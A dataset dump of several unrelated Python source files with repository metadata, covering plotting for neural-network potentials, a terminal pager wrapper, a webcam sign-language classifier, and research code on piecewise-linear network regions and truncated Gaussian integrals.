xlb=["G1"]
clr=["b"]
for i in range(1, 25):
xlb.append("G2-"+str(i))
clr.append("g")
for i in range(1, 17):
xlb.append("G4-"+str(i))
clr.append("c")
for grp in grps:
symdtt, symdtp = [],[]
plotfileT=outfolder+grp+"-Gdata-T.png"
plotfileP=outfolder+grp+"-Gdata-P.png"
for i in range(1, 11):
# the 'mix' group has a second nested sample index
if grp=='mix':
for j in range(1, 11):
datadir=root+grp+"/"+str(i)+"/"+str(j)
symfft=datadir+"/data/CrystalSi64/symmetry_function.npz"
symt= np.load(symfft)
symdata= symt['sym_func']
symdtt.append(symdata)
symffp=datadir+"/predict-phono3py-2/output-phono3py/symmetry_function-pred.npz"
symp= np.load(symffp)
symdata= symp['sym_func']
symdtp.append(symdata)
else:
datadir=root+grp+"/"+str(i)
symfft=datadir+"/data/CrystalSi64/symmetry_function.npz"
symt= np.load(symfft)
symdata= symt['sym_func']
symdtt.append(symdata)
symffp=datadir+"/predict-phono3py-2/output-phono3py/symmetry_function-pred.npz"
symp= np.load(symffp)
symdata= symp['sym_func']
symdtp.append(symdata)
print(f'Symm_func of {grp} is gathered')
stnparr=np.array(symdtt)
plttitle=f'[{md}/{grp}] Train({stnparr.shape}) Symm_Func G value'
plotG(symdtt, plttitle, plotfileT, xlb, clr)
spnparr=np.array(symdtp)
plttitle=f'[{md}/{grp}] Predict({spnparr.shape}) Symm_Func G value'
plotG(symdtp, plttitle, plotfileP, xlb, clr)
print(f'Symm_func of {grp} is plotted')
if __name__ == '__main__':
#Plot Lammps-MD LC7 Symm_Func of Train & Predict
root="/home/okugawa/HDNNP/Si-190808/1000K-LC7/"
outfolder="/home/okugawa/HDNNP/Si-190808/result-LC7/symf/"
grps=['0.95','0.97','0.99','1.00','1.01','1.03','1.05','mix']
gatherG(root, outfolder, grps, "Lammps-MD")
#Plot AIMD LC7 Symm_Func of Train & Predict
# note: the AIMD group list spells 1.0 without trailing zero
root="/home/okugawa/HDNNP/Si-190808-md/1000K-LC7n/"
outfolder="/home/okugawa/HDNNP/Si-190808-md/result-LC7n/symf/"
grps=['0.95','0.97','0.99','1.0','1.01','1.03','1.05','mix']
gatherG(root, outfolder, grps, "AIMD") | s-okugawa/HDNNP-tools | tools/Lmps-MD/plotSymF-TP2.py | plotSymF-TP2.py | py | 3,233 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.title",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "ma... |
35162208747 | import sys
import atexit
import subprocess
import typing
class AutoPager:
# Redirects sys.stdout through `less -F` when attached to a TTY, so long
# output is paged; the pager is flushed/closed via an atexit hook.
# NOTE(review): the `no_pager` and `always` flags are stored but never
# consulted in the visible code -- confirm they are honored elsewhere.
def __init__(self, no_pager: bool = False, always: bool = False):
self.original_stdout = sys.stdout
self.always = always
self.no_pager = no_pager
if self.original_stdout.isatty():
# -F makes less exit immediately if output fits on one screen
self.process: typing.Optional[
subprocess.Popen[str]] = subprocess.Popen(
['/usr/bin/less', '-F'],
stdin=subprocess.PIPE,
encoding='utf-8')
sys.stdout = self.process.stdin  # type: ignore
else:
# not a terminal (e.g. piped): leave stdout untouched
self.process = None
atexit.register(self.output)
def output(self):
# Close the pager's stdin and wait for it to finish rendering.
if self.process:
self.process.communicate()
| informationsea/cromwell-helpers | cromwellhelper/pager.py | pager.py | py | 751 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.stdout",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "typing.Optional",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "subprocess.Popen",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "subprocess.... |
72503316195 | import cv2
import numpy as np
from keras.models import load_model
# Load the trained sign-language CNN once at import time (path is relative
# to the working directory).
model = load_model('CNNmodel.h5')
def prediction(pred):
    """Map a class index in [0, 25] to its capital-letter label 'A'-'Z'."""
    offset_a = ord('A')  # 65
    return chr(offset_a + pred)
def keras_predict(model1, image):
    """Run ``model1`` on ``image`` and return the top prediction.

    Args:
        model1: any object with a Keras-style ``predict`` method.
        image: array-like batch accepted by ``model1.predict``.

    Returns:
        Tuple ``(probability, class_index)`` for the highest-scoring class.
    """
    data = np.asarray(image, dtype="int32")
    pred_probab = model1.predict(data)[0]
    # np.argmax replaces the original list()/index() double scan; like
    # index(max(...)) it returns the first maximum on ties.
    pred_class = int(np.argmax(pred_probab))
    return max(pred_probab), pred_class
def keras_process_image(img):
    """Resize a grayscale frame to the 28x28 input expected by the CNN.

    Bug fix: ``cv2.resize`` takes a 2-D ``(width, height)`` dsize; the
    original ``(1, 28, 28)`` tuple raised an error at runtime.  Callers that
    need leading batch/channel axes should add them afterwards (e.g. with
    ``np.expand_dims``), as ``main`` already does.
    """
    img = cv2.resize(img, (28, 28), interpolation=cv2.INTER_AREA)
    return img
def crop_image(image, x, y, width, height):
    """Return the width x height sub-image whose top-left corner is (x, y)."""
    top, bottom = y, y + height
    left, right = x, x + width
    return image[top:bottom, left:right]
def main():
    """Capture webcam frames, classify the sign in the bottom-left ROI and
    overlay the predicted letter until 'q' is pressed.

    Bug fix: the camera was re-opened on every loop iteration, leaking
    capture handles; it is now opened once and released on exit.
    """
    webcam = cv2.VideoCapture(0)
    while True:
        rval, frame = webcam.read()
        frame = cv2.flip(frame, 1)  # mirror for a natural preview
        im2 = crop_image(frame, 0, 300, 300, 300)
        image_grayscale = cv2.cvtColor(im2, cv2.COLOR_BGR2GRAY)
        image_grayscale_blurred = cv2.GaussianBlur(image_grayscale, (15, 15), 0)
        im3 = cv2.resize(image_grayscale_blurred, (28, 28), interpolation=cv2.INTER_AREA)
        im4 = np.resize(im3, (28, 28, 1))
        im5 = np.expand_dims(im4, axis=0)  # add batch axis -> (1, 28, 28, 1)
        pred_probab, pred_class = keras_predict(model, im5)
        curr = prediction(pred_class)
        cv2.putText(frame, curr, (10, 300), cv2.FONT_HERSHEY_COMPLEX, 1, (255, 255, 255), 2)
        cv2.rectangle(frame, (0, 300), (300, 600), (255, 255, 00), 3)
        cv2.imshow("frame", frame)
        cv2.imshow("Image3", image_grayscale_blurred)
        if cv2.waitKey(25) & 0xFF == ord('q'):
            cv2.destroyAllWindows()
            break
    webcam.release()
if __name__ == '__main__':
main()
# cam_capture.release()
# final safety net: close any OpenCV windows left open
cv2.destroyAllWindows()
| CharizmaticWizard/Sign-Language-Detection | capture.py | capture.py | py | 1,644 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "keras.models.load_model",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "cv2.resize",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "cv2.INTER_AREA",
... |
70205308194 | from dp import *
import pickle
from collections import defaultdict
from most_probable_sequence import most_probable_sequence
from utils import get_data
from rich import print
def load_weights(run_name, weights_root):
    """Load the (w, b) parameter arrays for a run.

    When ``run_name`` is given, parameters come from ``outputs/<run_name>/``;
    otherwise the initial parameters under ``weights_root`` are used.
    """
    base = weights_root if run_name is None else f"outputs/{run_name}"
    return np.load(f"{base}/w.npy"), np.load(f"{base}/b.npy")
def evaluate_map(features, y_true, weights_root, d=None):
    """Evaluate MAP (per-frame arg-max) decoding with the initial weights.

    Args:
        features: sequence of per-recording feature matrices.
        y_true: sequence of per-recording ground-truth count vectors.
        weights_root: directory holding the initial w.npy / b.npy.
        d: optional mapping true-class -> list of predicted classes, updated
           in place so callers can accumulate statistics across calls.

    Returns:
        List of per-recording RVCE (relative count error) values.
    """
    # Bug fix: the original used a mutable default (d=defaultdict(list)),
    # silently sharing one accumulator across every call that omitted d.
    if d is None:
        d = defaultdict(list)
    w, b = load_weights(None, weights_root)
    rvces = []
    for features_i, y_true_i in zip(features, y_true):
        features_i = features_i[::2]  # keep every other frame
        scores = w @ features_i.T + b.reshape(-1, 1)
        y_pred = scores.argmax(0)
        rvce = abs(y_pred.sum() - y_true_i.sum()) / y_true_i.sum()
        rvces.append(rvce)
        # pair each prediction with the true count of the two frames it spans
        y_t = y_true_i[::2] + y_true_i[1::2]
        assert len(y_t) == len(y_pred)
        for p, t in zip(y_pred, y_t):
            d[t].append(p)
    print("MAP")
    print(f"{np.mean(rvces):.3f} ± {np.std(rvces):.3f}")
    print()
    return rvces
def evaluate(
    features,
    y_true,
    weights_root,
    run_name=None,
    d=None,
    predictions=None,
):
    """Evaluate structured (most-probable-sequence) decoding.

    Args:
        features, y_true: per-recording feature matrices / count vectors.
        weights_root: directory with initial parameters (used when
            ``run_name`` is None).
        run_name: optional trained-run name under ``outputs/``.
        d: optional true-class -> predicted-class accumulator (in place).
        predictions: optional recording-index -> predictions accumulator.

    Returns:
        List of per-recording RVCE values.
    """
    # Bug fix: both accumulators used mutable default arguments
    # (defaultdict(list)) shared across calls; create fresh ones per call.
    if d is None:
        d = defaultdict(list)
    if predictions is None:
        predictions = defaultdict(list)
    w, b = load_weights(run_name, weights_root)
    Y = 6
    # only the first 2*Y rows/biases parameterize the sequence model
    w = w[: 2 * Y]
    b = b[: 2 * Y]
    rvces = []
    for i, (features_i, y_true_i) in enumerate(zip(features, y_true)):
        f = calc_f(features_i, w, b)
        length, y_pred = most_probable_sequence(f)
        predictions[i].append(y_pred)
        rvce = abs(y_pred.sum() - y_true_i.sum()) / y_true_i.sum()
        rvces.append(rvce)
        y_p = y_pred[::2] + y_pred[1::2]
        y_t = y_true_i[::2] + y_true_i[1::2]
        for p, t in zip(y_p, y_t):
            d[t].append(p)
    print("Structured")
    print(run_name if run_name is not None else "initial")
    print(f"{np.mean(rvces):.3f} ± {np.std(rvces):.3f}")
    print()
    return rvces
def plot(d, d_map):
# Left panel: average predicted class vs true class for the structured and
# MAP decoders, plus the identity line.  Right panel: class distribution.
# Saved to a fixed path under outputs/.
fig, axes = plt.subplots(1, 2, figsize=(12, 5))
X = []
Y = []
Y_map = []
distribution = []
# iterate classes in sorted order so the x axis is monotone
d = {k: d[k] for k in sorted(d)}
for label, preds in d.items():
X.append(label)
Y.append(np.mean(preds))
preds_map = d_map[label]
# MAP may have no samples for a class; plot 0 in that case
Y_map.append(np.mean(preds_map) if len(preds_map) > 0 else 0)
distribution.append(len(preds))
axes[0].set_xlabel("True class")
axes[0].set_ylabel("Average Predicted class")
axes[0].plot(X, Y, "o-", label="structured")
axes[0].plot(X, Y_map, "o-", label="MAP")
axes[0].plot(range(len(X)), "o-", label="true")
axes[0].grid()
axes[0].legend()
axes[1].set_xlabel("Class")
axes[1].set_ylabel("Number of events")
axes[1].grid()
axes[1].plot(distribution, "o-")
plt.tight_layout()
plt.savefig("outputs/bmrm_true_vs_pred_class.png")
if __name__ == "__main__":
# Experiment driver.  The many triple-quoted blocks below are alternative
# run configurations kept around as dead strings; only the LAST live
# assignments of `runs`, `tst_files_root` and `normalize_X` take effect.
# NOTE(review): selecting configurations via CLI args would be safer than
# editing comment fences.
normalize_X = False
# ''' old
runs = [
"divine-darkness-365",  # split_0
"elated-lake-399",  # split_1
"peach-oath-408",  # split_2
"fresh-durian-435",  # split_3
"peach-armadillo-462",  # split_4
]
# '''
""" 031_RX100_resized_128_sr_22050
# trained on:
# - files/031_RX100_resized_128_sr_22050/trn/split_*/shuffled/whole_file
runs = [
'solar-wind-634', # split_0
'floral-gorge-654', # split_1
'restful-glitter-698', # split_2
'noble-firefly-711', # split_3
'leafy-music-763' # split_4
]
# """
""" 035_RX100_resized_128_audio_image_augmentation_bs_256
runs = [
'glad-terrain-496', # split_0
'noble-waterfall-518', # split_1
'sage-dragon-541', # split_2
'eternal-cloud-563', # split_3
'dry-wildflower-574' # split_4
]
# """
""" 031_RX100_resized_128_sr_22050
# trained on:
# - "files/031_RX100_resized_128_sr_22050/trn/split_*/shuffled/10_minutes/5_samples"
# - "files/031_RX100_resized_128_sr_22050/trn/split_*/shuffled/whole_file"
runs = [
'honest-paper-1025',
'frosty-moon-1035',
'magic-silence-1076',
'graceful-eon-1089',
'laced-elevator-1111'
]
# """
""" 031_RX100_resized_128_sr_22050
# trained on:
# - "files/031_RX100_resized_128_sr_22050/trn/split_*/shuffled/10_minutes/5_samples"
runs = [
'silver-disco-893',
'gentle-surf-922',
'ruby-jazz-944',
'resilient-wind-963',
'twilight-waterfall-1008'
]
# """
""" 031_RX100_resized_128_sr_22050
# 031_RX100_resized_128_sr_22050
# trained on:
# - "files/031_more_validation_samples/trn/split_4/shuffled/whole_file"
runs = [
'different-sunset-1159',
'swift-tree-1198',
'likely-sky-1224',
'sage-glitter-1231',
'young-sea-1259'
]
# """
""" 031_more_validation_samples
# trained on:
# - "files/031_more_validation_samples/trn/split_4/shuffled/whole_file"
runs = [
'vital-wood-1302',
'treasured-bird-1305',
'genial-grass-1313',
'still-voice-1315',
'astral-deluge-1322'
]
# """
""" BMRM
runs = [
'dauntless-microwave-39',
'fallen-breeze-39',
'driven-eon-41',
'leafy-sun-43',
'vocal-dew-41'
]
# """
""" BMRM with normalized X
runs = [
'devout-waterfall-84',
'kind-rain-88',
'laced-sun-86',
'serene-forest-87',
'fallen-dream-84'
]
normalize_X = True
# """
""" BMRM only biases
runs = [
'solar-field-203',
'pretty-lion-203',
'solar-shadow-203',
'fast-morning-203',
'happy-feather-207'
]
# """
tst_files_root = 'files/031_RX100_resized_128_sr_22050'
# BMRM files/036 (the active configuration)
runs = [
'zesty-oath-246',
'elated-pond-244',
'golden-flower-247',
'dauntless-wildflower-245',
'toasty-frog-248'
]
tst_files_root = 'files/036'
d_map = defaultdict(list)
d = defaultdict(list)
rvces = []
rvces_map = []
# one trained run per cross-validation split
for split, run_name in enumerate(runs):
print("-" * 10)
print(f"Split: {split} Run: {run_name}\n")
Y, X = get_data(
f"{tst_files_root}/tst/split_{split}/shuffled/whole_file",
normalize_X=normalize_X,
)
weights_root = f"{tst_files_root}/params/split_{split}"
# evaluate using MAP inference
rvces_run_map = evaluate_map(X, Y, weights_root, d_map)
rvces_map.extend(rvces_run_map)
# evaluate using most probable sequence (not trained)
evaluate(X, Y, weights_root)
# evaluate using most probable sequence (trained)
rvces_run = evaluate(X, Y, weights_root, run_name, d)
rvces.extend(rvces_run)
rvces = np.array(rvces)
print("-" * 10)
print("Final")
print(f"STRUCTURED = {np.mean(rvces):.3f} ± {np.std(rvces):.3f}")
print(f"MAP = {np.mean(rvces_map):.3f} ± {np.std(rvces_map):.3f}")
print()
plot(d, d_map)
| yermandy/most-probable-sequence | inference.py | inference.py | py | 7,238 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "collections.defaultdict",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "rich.print",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "rich.print",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "rich.print",
"line_... |
33286894157 | import sys
sys.path.insert(0, "../SymJAX")
from scipy.stats import kde, multivariate_normal
import cdd
import numpy as np
import itertools
from scipy.spatial import ConvexHull, Delaunay
from scipy.special import softmax
from numpy.linalg import lstsq
from tqdm import tqdm
import symjax as sj
import symjax.tensor as T
from multiprocessing import Pool, Array
import networks
# Global debug verbosity flag (0 = quiet).
VERBOSE = 0
def create_fns(input, in_signs, Ds, x, m0, m1, m2, batch_in_signs, alpha=0.1,
sigma=1, sigma_x=1, lr=0.0002):
# Build the symjax computation graph for a leaky-ReLU deep network and its
# per-region affine maps (A, B), plus the EM training loss and compiled
# functions.  Ds lists layer widths; alpha is the leaky slope.
# NOTE(review): the parameter `input` shadows the builtin; indentation was
# lost in extraction, so nesting below is the presumed structure.
cumulative_units = np.concatenate([[0], np.cumsum(Ds[:-1])])
BS = batch_in_signs.shape[0]
Ws = [T.Variable(sj.initializers.glorot((j, i)) * sigma)
for j, i in zip(Ds[1:], Ds[:-1])]
# last layer bias starts at zero, hidden biases use He init
bs = [T.Variable(sj.initializers.he((j,)) * sigma) for j in Ds[1:-1]]\
+ [T.Variable(T.zeros((Ds[-1],)))]
A_w = [T.eye(Ds[0])]
B_w = [T.zeros(Ds[0])]
A_q = [T.eye(Ds[0])]
B_q = [T.zeros(Ds[0])]
batch_A_q = [T.eye(Ds[0]) * T.ones((BS, 1, 1))]
batch_B_q = [T.zeros((BS, Ds[0]))]
maps = [input]
signs = []
masks = [T.ones(Ds[0])]
# masks derived from externally supplied sign patterns (leaky slope alpha)
in_masks = T.where(T.concatenate([T.ones(Ds[0]), in_signs]) > 0, 1., alpha)
batch_in_masks = T.where(T.concatenate([T.ones((BS, Ds[0])),
batch_in_signs], 1) > 0, 1., alpha)
# forward pass, recording per-layer signs and leaky-ReLU masks
for w, b in zip(Ws[:-1], bs[:-1]):
pre_activation = T.matmul(w, maps[-1]) + b
signs.append(T.sign(pre_activation))
masks.append(T.where(pre_activation > 0, 1., alpha))
maps.append(pre_activation * masks[-1])
maps.append(T.matmul(Ws[-1], maps[-1]) + bs[-1])
# compute per region A and B
for start, end, w, b, m in zip(cumulative_units[:-1],
cumulative_units[1:], Ws, bs, masks):
A_w.append(T.matmul(w * m, A_w[-1]))
B_w.append(T.matmul(w * m, B_w[-1]) + b)
A_q.append(T.matmul(w * in_masks[start:end], A_q[-1]))
B_q.append(T.matmul(w * in_masks[start:end], B_q[-1]) + b)
batch_A_q.append(T.matmul(w * batch_in_masks[:, None, start:end],
batch_A_q[-1]))
batch_B_q.append((w * batch_in_masks[:, None, start:end]\
* batch_B_q[-1][:, None, :]).sum(2) + b)
batch_B_q = batch_B_q[-1]
batch_A_q = batch_A_q[-1]
signs = T.concatenate(signs)
# H-representation [b, A] rows scaled by the sign patterns
inequalities = T.hstack([T.concatenate(B_w[1:-1])[:, None],
T.vstack(A_w[1:-1])]) * signs[:, None]
inequalities_code = T.hstack([T.concatenate(B_q[1:-1])[:, None],
T.vstack(A_q[1:-1])]) * in_signs[:, None]
#### loss (negative expected complete-data log-likelihood)
log_sigma2 = T.Variable(sigma_x)
sigma2 = T.exp(log_sigma2)
Am1 = T.einsum('qds,nqs->nqd', batch_A_q, m1)
Bm0 = T.einsum('qd,nq->nd', batch_B_q, m0)
B2m0 = T.einsum('nq,qd->n', m0, batch_B_q**2)
AAm2 = T.einsum('qds,qdu,nqup->nsp', batch_A_q, batch_A_q, m2)
inner = - (x * (Am1.sum(1) + Bm0)).sum(1) + (Am1 * batch_B_q).sum((1, 2))
loss_2 = (x ** 2).sum(1) + B2m0 + T.trace(AAm2, axis1=1, axis2=2).squeeze()
loss_z = T.trace(m2.sum(1), axis1=1, axis2=2).squeeze()
cst = 0.5 * (Ds[0] + Ds[-1]) * T.log(2 * np.pi)
loss = cst + 0.5 * Ds[-1] * log_sigma2 + inner / sigma2\
+ 0.5 * loss_2 / sigma2 + 0.5 * loss_z
mean_loss = loss.mean()
adam = sj.optimizers.NesterovMomentum(mean_loss, Ws + bs, lr, 0.9)
train_f = sj.function(batch_in_signs, x, m0, m1, m2, outputs=mean_loss, updates=adam.updates)
f = sj.function(input, outputs=[maps[-1], A_w[-1], B_w[-1],
inequalities, signs])
g = sj.function(in_signs, outputs=[A_q[-1], B_q[-1]])
all_g = sj.function(in_signs, outputs=inequalities_code)
h = sj.function(input, outputs=maps[-1])
return f, g, h, all_g, train_f, sigma2
def lse(x, axis):
    """Numerically stable log-sum-exp of ``x`` along ``axis``.

    Generalized: the original hard-coded ``x_max[:, None]``, which only
    broadcast correctly for 2-D input with axis=1; ``np.expand_dims``
    preserves that behavior while supporting any rank/axis.
    """
    x_max = x.max(axis=axis)
    return np.log(np.sum(np.exp(x - np.expand_dims(x_max, axis)), axis=axis)) + x_max
def find_region(z, regions, input2sign):
    """For each point in ``z``, return the index (in key order of
    ``regions``) of the region whose sign pattern matches the point."""
    point_signs = np.array([input2sign(point.reshape((-1,))) for point in z])
    region_signs = np.array(list(regions.keys()))
    matches = np.equal(point_signs[:, None, :], region_signs).all(2)
    return matches.argmax(1)
def in_region(z, ineq):
    """
    z is shape (N, S) or (S)
    ineq is shape (K, S+1)
    """
    batched = z.ndim > 1
    if ineq is None:
        # no constraints: every point is inside
        return np.ones(z.shape[0], dtype='bool') if batched else True
    if batched:
        # prepend a column of ones so rows act as [b, A] on (1, z)
        zp = np.hstack([np.ones((z.shape[0], 1)), z])
        return (np.einsum('ks,ns->nk', ineq, zp) >= 0).all(axis=1)
    return (ineq.dot(np.hstack([np.ones(1), z])) >= 0).all()
def get_simplices(vertices):
    """compute the simplices from a convex polytope given in its
    V-representation

    vertices: array of shape (V, D) with V the number of vertices
    """
    n_vertices, dim = vertices.shape
    if dim == 1:
        # a 1-D polytope is a segment: exactly two vertices, one simplex
        assert n_vertices == 2
        return [[0, 1]]
    return Delaunay(vertices).simplices
def flip(A, i):
    """Return ``A`` with entry ``i`` (or row ``i`` when A is 2-D) negated."""
    signs = np.where(np.arange(len(A)) == i, -1.0, 1.0).astype('float32')
    if A.ndim == 2:
        signs = signs[:, None]  # broadcast along rows
    return A * signs
def reduce_ineq(ineqs):
    """Return the indices of inequalities that are neither degenerate
    (near-zero normal vector) nor redundant per cdd's canonicalization."""
    degenerate = set(np.nonzero(np.linalg.norm(ineqs, 2, 1) < 1e-8)[0])
    mat = cdd.Matrix(ineqs)
    mat.rep_type = cdd.RepType.INEQUALITY
    redundant = set(mat.canonicalize()[1])
    return list(set(range(len(ineqs))) - degenerate - redundant)
def find_neighbours(signs2ineq, signs):
    """Return the sign vectors of all regions adjacent to ``signs``; each
    neighbour flips exactly one non-redundant inequality's sign."""
    ineq = signs2ineq(np.array(signs))
    active = reduce_ineq(ineq)
    # one row per active face, with a -1 at the flipped coordinate
    flips = np.ones((len(active), len(signs)))
    flips[np.arange(len(active)), active] = -1
    return flips * signs
def search_region(signs2ineq, signs2Ab, signs, max_depth=9999999999999):
# Breadth-first exploration of all sign regions reachable from `signs`,
# returning {sign-tuple: {'ineq': reduced H-rep, 'Ab': affine map}}.
# NOTE(review): `max_depth` is accepted but never used -- the search always
# runs to exhaustion; confirm before relying on it.
S = dict()
# init
all_signs = []
# init the to_visit
to_visit=[list(signs)]
# search all the regions (their signs)
while True:
all_signs += to_visit
to_visit_after = []
for s in to_visit:
neighbours = find_neighbours(signs2ineq, s)
for n in neighbours:
# skip neighbours already queued or visited (linear scans)
a = np.any([np.array_equal(n,p) for p in to_visit_after])
b = np.any([np.array_equal(n,p) for p in to_visit])
c = np.any([np.array_equal(n,p) for p in all_signs])
if not (a + b + c):
to_visit_after.append(n)
if len(to_visit_after) == 0:
break
to_visit = to_visit_after
# not set up S
for s in all_signs:
ineq = signs2ineq(s)
S[tuple(s)] = {'ineq': ineq[reduce_ineq(ineq)], 'Ab': signs2Ab(s)}
return S
def get_vertices(inequalities):
    """Return the V-representation (generators) of the polyhedron whose
    H-representation rows are [b, -A] (from b - Ax >= 0)."""
    h_rep = cdd.Matrix(inequalities)
    h_rep.rep_type = cdd.RepType.INEQUALITY
    return cdd.Polyhedron(h_rep).get_generators()
def mvstdnormcdf(lower, cov):
"""Integrate a zero-mean multivariate Gaussian over the semi-infinite
rectangle [lower, +inf).

Parameters
----------
lower: array
the lower bound of the rectangular region, vector of length d
cov: array
the covariance matrix, matrix of shape (d, d)
"""
n = len(lower)
if n == 1:
# 1-D case: survival function of the scalar Gaussian
return 1 - multivariate_normal.cdf(lower, cov=cov)
upper = [np.inf] * n
# encode finite/infinite bounds for Fortran mvndst: 2=both finite bounds
lowinf = np.isneginf(lower)
uppinf = np.isposinf(upper)
infin = 2.0 * np.ones(n)
np.putmask(infin,lowinf,0)
np.putmask(infin,uppinf,1)
np.putmask(infin, lowinf*uppinf, -1)
# mvndst expects the strict lower-triangle of the correlation matrix
correl = cov[np.tril_indices(n, -1)]
options = {'abseps': 1e-20, 'maxpts': 6000 * n}
# NOTE(review): scipy.stats.kde.mvn is a legacy private binding removed in
# recent SciPy versions -- verify against the pinned scipy release.
error, cdfvalue, inform = kde.mvn.mvndst(lower, upper, infin, correl,
**options)
if inform:
print('something wrong', inform, error)
return cdfvalue
def mu_u_sigma_u(low, cov, u):
# Conditional mean/covariance of the remaining coordinates given that the
# coordinate(s) `u` sit at their lower bound(s) low[u].
# NOTE(review): the submatrix selections look swapped relative to the
# standard conditional-Gaussian formula: `cov_u` is taken over the KEPT
# coordinates rather than over `u` (for vector u the matmul shapes only
# line up when D == 4), and the scalar branch divides elementwise by a
# matrix.  Strongly suspect cov[u][:, u] was intended -- verify.
D = len(cov)
if np.isscalar(u):
keeping = np.arange(D) != u
else:
keeping = (np.arange(D) != u[0]) * (np.arange(D) != u[1])
# cross-covariance between kept coordinates and u
cov_no_u = cov[keeping][:, u]
cov_u = cov[keeping][:, keeping]
if np.isscalar(u):
cov_ = cov_u - np.outer(cov_no_u, cov_no_u) / cov_u
mu_ = cov_no_u * low[u] / cov_u
else:
inv_cov_u = np.linalg.inv(cov_u)
cov_ = cov_u - cov_no_u.dot(inv_cov_u.dot(cov_no_u.T))
mu_ = cov_no_u.dot(inv_cov_u.dot(low[u]))
return mu_, cov_, low[keeping]
def get_F_G(lower, cov):
"""Compute the first-order (f) and second-order (g) boundary terms used by
the truncated-Gaussian moment formulas: for each finite lower bound k,
f[k] is the marginal density at the bound times the conditional orthant
probability; g[k, q] is the analogous pairwise term.
"""
D = len(lower)
f = np.zeros(D)
g = np.zeros((D, D))
for k in range(len(lower)):
# unconstrained directions contribute nothing
if lower[k] == - np.inf:
continue
f[k] = multivariate_normal.pdf(lower[k], cov=cov[k, k])
if len(cov) > 1:
# multiply by P(remaining coords >= their bounds | coord k at bound)
mu_u, cov_u, low_no_u = mu_u_sigma_u(lower, cov, k)
f[k] *= mvstdnormcdf(low_no_u - mu_u, cov_u)
for q in range(len(lower)):
# pairwise terms only exist in dimension > 2 with both bounds finite
if q == k or len(lower) <= 2 or lower[q] == - np.inf:
continue
u = [k, q]
g[k, q] = multivariate_normal.pdf(lower[u], cov=cov[u][:, u])
if len(cov) > 2:
mu_u, cov_u, low_no_u = mu_u_sigma_u(lower, cov, u)
g[k, q] *= mvstdnormcdf(low_no_u - mu_u, cov_u)
return f, g
def create_H(M):
    """Complete the K rows of ``M`` (K x D, K < D) with D - K additional
    unit-norm rows, each a least-squares solution against the rows built so
    far; returns only the appended rows."""
    n_rows, dim = M.shape
    A = np.copy(M)
    for step in range(dim - n_rows):
        A = np.vstack((A, np.ones((1, dim))))
        rhs = np.zeros(n_rows + 1 + step)
        rhs[-1] = 1
        vec = lstsq(A, rhs, rcond=-1)[0]
        A[-1] = vec / np.linalg.norm(vec, 2)
    return A[n_rows:]
def cones_to_rectangle(ineqs, cov):
    """Map a (possibly unconstrained) cone to a rectangular integration
    domain ``(lower_bounds, R)``.

    Args:
        ineqs: rows ``[b, A]`` describing the cone, or None for no
            constraints.  NOTE: normalized **in place**, mutating the
            caller's array.
        cov: covariance used to build the complementary directions.
    """
    # first the general case without constraints
    if ineqs is None:
        lower = np.array([-np.inf] * len(cov))
        return lower, np.eye(len(lower))
    ineqs /= np.linalg.norm(ineqs[:, 1:], 2, 1, keepdims=True)
    A, b = ineqs[:, 1:], - ineqs[:, 0]
    D = A.shape[1] - A.shape[0]
    if D == 0:
        R = A
    else:
        # Bug fix: the original computed R twice, the first assignment being
        # immediately overwritten (dead code); only the cov-weighted
        # completion is kept.
        R = np.vstack([A, create_H(A).dot(np.linalg.inv(cov))])
    return np.concatenate([b, np.array([-np.inf] * D)]), R
def simplex_to_cones(vertices):
# Decompose a simplex into signed cones via inclusion-exclusion over the
# subsets of its facet inequalities: returns (list of inequality subsets,
# matching +/-1 signs).  The leading (None, (-1)**S) entry is the
# unconstrained term.
S = vertices.shape[1]
# prepend the homogenizing 1-column for cdd's generator representation
m = cdd.Matrix(np.hstack([np.ones((vertices.shape[0], 1)), vertices]))
m.rep_type = cdd.RepType.GENERATOR
v = np.array(cdd.Polyhedron(m).get_inequalities())
subsets = set()
values = set(range(v.shape[0]))
# all proper non-empty subsets of the facet set
for n in range(1, v.shape[0]):
subsets = subsets.union(set(itertools.combinations(values, n)))
signs = [(-1)**S] + [(-1)**(len(J) + S) for J in subsets]
sets = [None] + [v[list(indices)] for indices in subsets]
return sets, signs
#######################################################
#
#
# MU, SIGMA
#
#######################################################
def mu_sigma(x, A, b, cov_z, cov_x):
    """takes a matrix of data x, all the region A and b and the cov x and x
    returns n covariance matrices and N x n bias vectors
    """
    # 1-D spaces fall back to scalar reciprocals instead of matrix inverses
    inv_cov_x = np.linalg.inv(cov_x) if A.shape[1] > 1 else 1 / cov_x
    inv_cov_z = np.linalg.inv(cov_z) if A.shape[2] > 1 else 1 / cov_z
    inv_cov_w = inv_cov_z + np.einsum('nds,dk,nkz->nsz', A, inv_cov_x, A)
    cov_w = np.linalg.inv(inv_cov_w) if A.shape[2] > 1 else 1 / inv_cov_w
    residual = x[:, None, :] - b
    projected = np.einsum('nds,dk,Nnk->Nns', A, inv_cov_x, residual)
    mu_w = np.einsum('nsk,Nnk->Nns', cov_w, projected)
    return mu_w, cov_w
####################################################
#
# PHIS
#
####################################################
def phis_w(ineq_w, mu, cov_w):
    """Moments (phi0, phi1, phi2) of a Gaussian N(mu, cov_w) restricted to
    the polytope described by rows ``[b, A]`` of ``ineq_w``.

    Bug fix: removed two leftover debug ``print`` calls that spammed stdout
    on every region evaluation.
    """
    # instead of integrating a non centered gaussian on w
    # we integrate a centered Gaussian on w-mu. This is equivalent to
    # adding mu to the bias of the inequality system
    ineqs = ineq_w + 0.
    ineqs[:, 0] += ineqs[:, 1:].dot(mu)
    # we initialize the accumulators
    phi0, phi1, phi2 = 0., 0., 0.
